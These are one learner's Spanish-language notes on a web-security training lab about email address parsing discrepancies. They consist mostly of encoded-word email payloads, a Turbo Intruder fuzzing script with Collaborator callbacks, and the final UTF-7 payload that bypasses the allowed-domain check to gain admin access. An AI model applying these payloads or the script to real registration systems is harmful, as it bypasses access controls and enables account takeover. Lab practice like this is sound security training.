🧊Lab: Bypassing access controls using email address parsing discrepancies

Aqui tengo mi paso a paso de este laboratorio, que a la fecha no he resuelto, por el momento solo tengo todas mis pruebas y apuntes para la resolución.

• Tenemos el dominio permitido que posiblemente es el que nos dará acceso como administrador, tendriamos que correr:

  • administrator@ginandjuice.shop

• =?utf-8?b?foobar@exploit-0aca001903ace6638045342f01eb00f1.exploit-server.net?=@ginandjuice.shop

• Zm9vYmFyQGV4cGxvaXQtMGFjYTAwMTkwM2FjZTY2MzgwNDUzNDJmMDFlYjAwZjEuZXhwbG9pdC1zZXJ2ZXIubmV0

Luego el correo de nuestro exploit codeado a base64 lo reemplazamos →

• =?utf-8?b?Zm9vYmFyQGV4cGxvaXQtMGFjYTAwMTkwM2FjZTY2MzgwNDUzNDJmMDFlYjAwZjEuZXhwbG9pdC1zZXJ2ZXIubmV0?=@ginandjuice.shop

Payloads de prueba que he creado durante el testing ->

=?x?q?YXR0YWNrZXI==40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?x?q?a+ACMtd-acker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?q?YXR0YWNrZXI==40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?b?YXR0YWNrZXI==40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?q?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?utf-8?b?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?x?q?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop
=?x?q?attacker=40exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop #bloqueado por razones de seguridad.


=?utf-8?q?foo=40ginandjuice.shop=3e=00?=attacker@exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net
## este de aqui abajo me registró exitosamente este correo: 
attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net@ginandjuice.shop
## pero no me llego a mi exploit server -> probemos con el metodo arcaico llamados rutas de origen -> 
collab%psres.net(@example.com ##ejemplo
attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net(@ginandjuice.shop #con el parentesis me trajo problemas
attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net@ginandjuice.shop #este puede ser, falta perfeccinarlo.
=?x?q?attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=@ginandjuice.shop #este puede ser, falta perfeccinarlo.

=?utf-8?q?attacker%exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net=3e=00?=foo@ginandjuice.shop 
admin%ginandjuice.shop@exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net # con este me dijo que solo los emails con el dominio juiceand..eran permitidos. 
oastify.com!collab\@example.com #vamos a probar este. 
exploit-0a7d00fa04ffebbf81f983f8015b00d8.exploit-server.net!attacker\@ginandjuice.shop
attacker%exploit-0aae00f404b478868139472901540007.exploit-server.net@ginandjuice.shop # se envia el correo pero no me llega a mi server. 
@ginandjuice.shop:attacker@exploit-0a0b00fb047fb9e7821f550f01a600f8.exploit-server.net
"=?utf-8?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net_?="@ginandjuice.shop
=?utf-8?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net_?=@ginandjuice.shop
=?x?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=20?=foo@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=20?=foo@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=00?=admin@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0a0e00b0035bb11380c6ac3101990060.exploit-server.net=3e=00?=administrator@ginandjuice.shop
=?x?q?$attacker=40exploit-0af0000204c9a2be814844be01960080.exploit-server.net=3e=1f?=foo@ginandjuice.shop
=?x?q?attacker=40exploit-0af0000204c9a2be814844be01960080.exploit-server.net=3e=1f?=foo@ginandjuice.shop
=?iso-8859-1?q?attacker=40exploit-0af0000204c9a2be814844be01960080.exploit-server.net=3e=1c?=foo@ginandjuice.shop

Payloads que usé en conjunción con Turbo Intruder ->

=?utf-8?b?YXR0YWNrZXI=?=@exploit-0a8b00ad03f9b612815b5692014700b5.exploit-server.net
=?utf-8?b?YXR0YWNrZXI=?=@ginandjuice.shop
RCPT TO:<"attacker@exploit-0a8b00ad03f9b612815b5692014700b5.exploit-server.net>attacker"@ginandjuice.shop>
Pedro@[10.11.12.13]
attacker%exploit-0ae4000104992d2c80faa268014000fe.exploit-server.net%mail.mit.edu@ginandjuice.shop #este tambien envia el registro de correo sin embargo no me llega nada al server exploit.

payloads = ["=?x?q?$collab1=40$collabServer=3e=00?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=01?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=02?=foo@$validServer"
            "=?x?q?$collab1=40$collabServer=3e=03?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=04?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=05?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=07?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=08?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=0e?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=0f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=10?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=11?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=13?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=15?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=16?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=17?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=19?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1a?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=1b?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=1c?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1d?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=1f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=20?=foo@$validServer", "=?x?q?$collab1=40$collabServer=2c?=x@$validServer",
            "=?utf7?q?$collab1&AEA-$collabServer&ACw-?=x@$validServer","=?utf7?q?$collab1&AEA-$collabServer&ACw=/xyz!-?=x@$validServer",
            "=?utf7?q?$collab1=26AEA-$collabServer=26ACw-?=x@$validServer","$collab1=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer","$collab1=?x?b?QA==?=$collabServer=?x?b?LA==?=x@$validServer"
]

payloads = ["=?x?q?attacker=40$collabServer=3e=00?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=01?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=02?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=03?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=04?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=05?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=07?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=08?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=0e?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=0f?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=10?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=11?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=13?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=15?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=16?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=17?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=19?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=1a?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=1b?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=1c?=foo@$validServer", "=?x?q?attacker=40$collabServer=3e=1d?=foo@$validServer",
"=?x?q?attacker=40$collabServer=3e=1f?=foo@$validServer","=?x?q?attacker=40$collabServer=3e=20?=foo@$validServer", "=?x?q?attacker=40$collabServer=2c?=x@$validServer",
"=?utf7?q?attacker&AEA-$collabServer&ACw-?=x@$validServer","=?utf7?q?attacker&AEA-$collabServer&ACw-/xyz!-?=x@$validServer",
"=?utf7?q?attacker=26AEA-$collabServer=26ACw-?=x@$validServer","attacker=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer","attacker=?x?b?QA==?=$collabServer=?x?b?LA==?=x@$validServer"
]

En este array actualizado, todas las instancias de "$collab1" han sido reemplazadas por "attacker", como se solicitó.

payloads = [
    "=?iso-8859-1?q?attacker=40$collabServer=3e=00?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=01?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=3e=02?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=03?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=04?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=3e=05?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=07?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=08?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=3e=0e?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=0f?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=10?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=3e=11?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=13?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=15?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=3e=16?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=17?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=19?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=3e=1a?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=1b?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=1c?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=3e=1d?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=1f?=foo@$validServer",
    "=?iso-8859-1?q?attacker=40$collabServer=3e=20?=foo@$validServer", 
    "=?iso-8859-1?q?attacker=40$collabServer=2c?=x@$validServer",
    "=?utf7?q?attacker&AEA-$collabServer&ACw-?=x@$validServer",
    "=?utf7?q?attacker&AEA-$collabServer&ACw-/xyz!-?=x@$validServer",
    "=?utf7?q?attacker=26AEA-$collabServer=26ACw-?=x@$validServer",
    "attacker=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer",
    "attacker=?iso-8859-1?b?QA==?=$collabServer=?iso-8859-1?b?LA==?=x@$validServer"
]

Intentando con Turbo Intruder con el script de Gareth Heyes →

payloads = [
    "=?utf-8?q?attacker=40$collabServer=3e=00?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=01?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=3e=02?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=03?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=04?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=3e=05?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=07?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=08?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=3e=0e?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=0f?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=10?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=3e=11?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=13?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=15?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=3e=16?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=17?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=19?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=3e=1a?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=1b?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=1c?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=3e=1d?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=1f?=foo@$validServer",
    "=?utf-8?q?attacker=40$collabServer=3e=20?=foo@$validServer", 
    "=?utf-8?q?attacker=40$collabServer=2c?=x@$validServer",
    "=?utf7?q?attacker&AEA-$collabServer&ACw-?=x@$validServer",
    "=?utf7?q?attacker&AEA-$collabServer&ACw-/xyz!-?=x@$validServer",
    "=?utf7?q?attacker=26AEA-$collabServer=26ACw-?=x@$validServer",
    "attacker=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer",
    "attacker=?utf-8?b?QA==?=$collabServer=?utf-8?b?LA==?=x@$validServer"
]

import base64
import urllib

REQUEST_SLEEP = 10
COLLAB_SLEEP = 10


payloads = ["=?x?q?$collab1=40$collabServer=3e=00?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=01?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=02?=foo@$validServer"
            "=?x?q?$collab1=40$collabServer=3e=03?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=04?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=05?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=07?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=08?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=0e?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=0f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=10?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=11?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=13?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=15?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=16?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=17?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=19?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1a?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=1b?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=1c?=foo@$validServer", "=?x?q?$collab1=40$collabServer=3e=1d?=foo@$validServer",
            "=?x?q?$collab1=40$collabServer=3e=1f?=foo@$validServer","=?x?q?$collab1=40$collabServer=3e=20?=foo@$validServer", "=?x?q?$collab1=40$collabServer=2c?=x@$validServer",
            "=?utf7?q?$collab1&AEA-$collabServer&ACw-?=x@$validServer","=?utf7?q?$collab1&AEA-$collabServer&ACw=/xyz!-?=x@$validServer",
            "=?utf7?q?$collab1=26AEA-$collabServer=26ACw-?=x@$validServer","$collab1=?utf7?b?JkFFQS0?=$collabServer=?utf7?b?JkFDdy0?=x@$validServer","$collab1=?x?b?QA==?=$collabServer=?x?b?LA==?=x@$validServer"
           ]
           
invalidServer = "blah.blah"
validServer = "exploit-0ac10009032e98f58073da2801a2008a.exploit-server.net"
shouldUrlEncode = False
collab = callbacks.createBurpCollaboratorClientContext()
collabServer = collab.getCollaboratorServerLocation()
#collabServer = "lazcacv8hjr9pygcnlmzb8d5xw3nrdf2.oastify.com"
mappings = {}

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=100,
                           pipeline=False,                     
                           maxRetriesPerRequest=3
                           )

    for payload in payloads:
        if "$hex" in payload:
            generateHex(0, 255, payload, engine)
        else:  
            manipulated = replacePayload(payload)
            engine.queue(target.req,  urllib.quote_plus(manipulated) if shouldUrlEncode else manipulated)
            time.sleep(REQUEST_SLEEP)
            
    print "Waiting for interactions..."
    counter = 0            
    while counter < 10 and engine.engine.attackState.get() < 3: 
        found = fetchInteractions(collab)
        print "Found " + str(found) + " interactions"
        time.sleep(COLLAB_SLEEP)
        counter += 1
        if found > 0:
            counter = 0
    print "Completed"    

def replacePayload(payload):
    id1 = collab.generatePayload(False)
    id2 = collab.generatePayload(False)
    manipulated = payload
    manipulated = manipulated.replace("$validServer", validServer);
    manipulated = manipulated.replace("$invalidServer", invalidServer);
    manipulated = manipulated.replace("$collabServer", collabServer);
    manipulated = manipulated.replace("$collab1", id1);
    manipulated = manipulated.replace("$collab2", id2);
    mappings[id1] = manipulated
    return manipulated

def generateHex(start, end, payload, engine):
    for chrNum in range(start, end + 1):          
        manipulated = replacePayload(payload)
        manipulated = manipulated.replace("$hex", "{:02x}".format(chrNum));
        engine.queue(target.req,  urllib.quote_plus(manipulated) if shouldUrlEncode else manipulated)
        time.sleep(REQUEST_SLEEP)

def fetchInteractions(collab):
    interactions = collab.fetchAllCollaboratorInteractions()
    found = interactions.size()
    for interaction in interactions:
        smtp = interaction.getProperty('conversation')
        currentInteractionId = interaction.getProperty('interaction_id')
        try:
            original_payload = mappings[currentInteractionId]
        except KeyError:
            print "failed to look up payload for interaction id "+currentInteractionId
            original_payload = 'lookup_failed'
        
        if smtp == None:
            print "Got DNS interaction - not reporting"
            continue

        print "Got SMTP interaction, about to report"
            
        decoded = base64.b64decode(smtp)             
        email = decoded.partition('RCPT TO:<')[2].partition('>\r\n')[0]
        print "Found interaction! " + original_payload + " with interaction " + currentInteractionId      
    return found

def handleResponse(req, interesting):
    table.add(req)

=?iso-8859-1?q?juanfelipeoz.rar=40gmail.com=3e=1c?=tester@mozilla.com

rhc1n3za9qgcbmrxigrrpzb6nxtohe53.oastify.com

rhc1n3za9qgcbmrxigrrpzb6nxtohe53.oastify.com
m8vweyq50l772his9bimgu21eskj8bw0.oastify.com
=?**iso-8859-1**?q?m8vweyq50l772his9bimgu21eskj8bw0=40oastify.com=3e=00?=foo@google.com
=?x?q?m8vweyq50l772his9bimgu21eskj8bw0=40oastify.com=3e=00?=foo@google.com
B2LEP7-ZUJLAB7-XDKC7D7-VAEMGY
=?iso-8859-1?q?m8vweyq50l772his9bimgu21eskj8bw0=40oastify.com=3e=00?=x@google.com
## VAMOS A PROBAR 
dp634o2qgr0anxxno6wgra9cw32uqke9.oastify.com
=?iso-8859-1?q?dp634o2qgr0anxxno6wgra9cw32uqke9=40oastify.com=3e=00?=z@mozilla.com
=?iso-8859-1?q?dp634o2qgr0anxxno6wgra9cw32uqke9=40oastify.com=3e=20?=z@mozilla.com
oa2epzn112ll88iy9hhrclunhen5bwzl.oastify.com

=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=00?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=01?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=02?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=03?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=04?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=05?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=07?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=08?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=0e?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=0f?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=10?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=11?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=13?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=15?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=16?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=17?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=19?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=1a?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=1b?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=1c?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=1d?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=1f?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=3e=20?=y@mozilla.com
=?iso-8859-1?q?j5p3i9i4qkl3ho5gkf54el8zzq5ht7hw=40oastify.com=2c?=y@mozilla.com

• =?utf-8?b?Zm9vYmFy?=@mozilla.com

=?iso-8859-1?q?YXR0YWNrZXI==40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=admin@ginandjuice.shop
=?iso-8859-1?q?=61=74=74=61=63=6b=65=72=40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=foo@ginandjuice.shop
YXR0YWNrZXI
=?utf-8?b?YXR0YWNrZXI=40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=@ginandjuice.shop
=?iso-8859-1?b?YXR0YWNrZXI=40exploit-0acf008c035176ce85383545012300a9.exploit-server.net=3e=00?=@ginandjuice.shop
ZXhwbG9pdC0wYWNmMDA4YzAzNTE3NmNlODUzODM1NDUwMTIzMDBhOS5leHBsb2l0LXNlcnZlci5uZXQ
=?iso-8859-1?b?YXR0YWNrZXI=40ZXhwbG9pdC0wYWNmMDA4YzAzNTE3NmNlODUzODM1NDUwMTIzMDBhOS5leHBsb2l0LXNlcnZlci5uZXQ=3e=00?=@ginandjuice.shop

Ahí vamos, algún día resolveré este condenado Laboratorio!

Payload Final:

Al fin, la solución certera para resolver este lab era con utf-7

• Donde el exploit server puede ser nuestro collab o el exploit server directo del lab, y ginandjuice.shop es directamente el dominio permitido que queremos bypassear.

=?utf-7?q?attacker&AEA-YOUR-EXPLOIT-SERVER_ID&ACA-?=@ginandjuice.shop

Y automaticamente nos llegará el correo al server:

Tendremos acceso directamente como admin, con el dominio permitido que acabamos de bypassear.

Delete carlos

Y resolvimos el lab: